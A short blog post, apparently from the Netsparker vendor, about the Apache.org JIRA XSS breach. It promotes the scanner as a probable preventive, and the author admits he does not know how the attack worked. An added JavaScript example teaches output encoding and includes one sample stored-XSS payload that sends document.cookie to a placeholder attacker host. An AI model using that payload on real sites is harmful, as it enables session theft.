
Netsparker and Apache.org - JIRA incident


Apparently, attackers exploited a Cross-site Scripting vulnerability to gain access to users' passwords on Apache.org's JIRA installation (some passwords in JIRA were stored in plain text).

Today, when I heard the news, I decided to download the latest demo version of JIRA and give it a try with Netsparker. Not surprisingly, Netsparker identified more than 10 XSS vulnerabilities in JIRA.

Obviously I don't know the details of the attack, or whether it relied on only one of these Cross-site Scripting vulnerabilities, but presumably it would have been prevented if either JIRA or Apache.org had used Netsparker Professional or the free Netsparker Community Edition.

I have already dropped an email to the Apache Security Team and offered them a free Netsparker Professional license.

Netsparker is currently still scanning the test system, but it has already identified many XSS instances, Permanent (stored) XSS issues and many other minor issues.
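As an added illustration (not code from this post, from Netsparker or from JIRA), the following shows the bug class behind a "Permanent XSS" finding and the fix for it: a stored comment rendered into HTML without output encoding, next to the same rendering with encoding, plus a URL-attribute check. The comment text and the attacker.example host are constructed sample data, and nothing here describes the actual Apache.org attack path, which the post does not detail.

```javascript
// Added example, not the original post's or JIRA's code. Constructed sample data.

// A comment an attacker might store in an issue tracker: no <script> tag needed,
// an event handler on an <img> runs just as well and can ship document.cookie off-site.
// (attacker.example is a placeholder host.)
const SAMPLE_COMMENT =
  'Looks good <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable sink: untrusted text concatenated straight into markup. Because the
// comment is persisted, every viewer of the page is hit: a stored (permanent) XSS.
function renderCommentUnsafe(text) {
  return '<div class="comment">' + text + '</div>';
}

// Fix for the HTML text and quoted-attribute contexts: encode the five characters
// that can change the parser's state.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderCommentSafe(text) {
  return '<div class="comment">' + escapeHtml(text) + '</div>';
}

// Encoding is not enough for URL attributes: a javascript: URL executes with no
// angle brackets at all, so allow-list the scheme before encoding. Assumes links
// are absolute; relative or unparsable values fall back to a harmless "#".
function safeHref(url) {
  let parsed;
  try {
    parsed = new URL(String(url));
  } catch {
    return '#';
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:'
    ? escapeHtml(parsed.href)
    : '#';
}

// Scanner-style check used below: list the element names that appear in a
// rendered fragment. Anything beyond the template's own <div> came from input.
function listTags(html) {
  return (html.match(/<([a-z][a-z0-9-]*)/gi) || []).map((t) => t.slice(1).toLowerCase());
}

console.log('unsafe tags:', listTags(renderCommentUnsafe(SAMPLE_COMMENT)));
console.log('safe tags:  ', listTags(renderCommentSafe(SAMPLE_COMMENT)));
```

Run with node: the unsafe render yields `['div', 'img']`, showing the injected element survived into the page, while the safe render yields only `['div']`. The same encoding applies to every place user-controlled text lands in a page (issue titles, comments, usernames), which is why a scanner reports the problem per sink rather than once per application.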
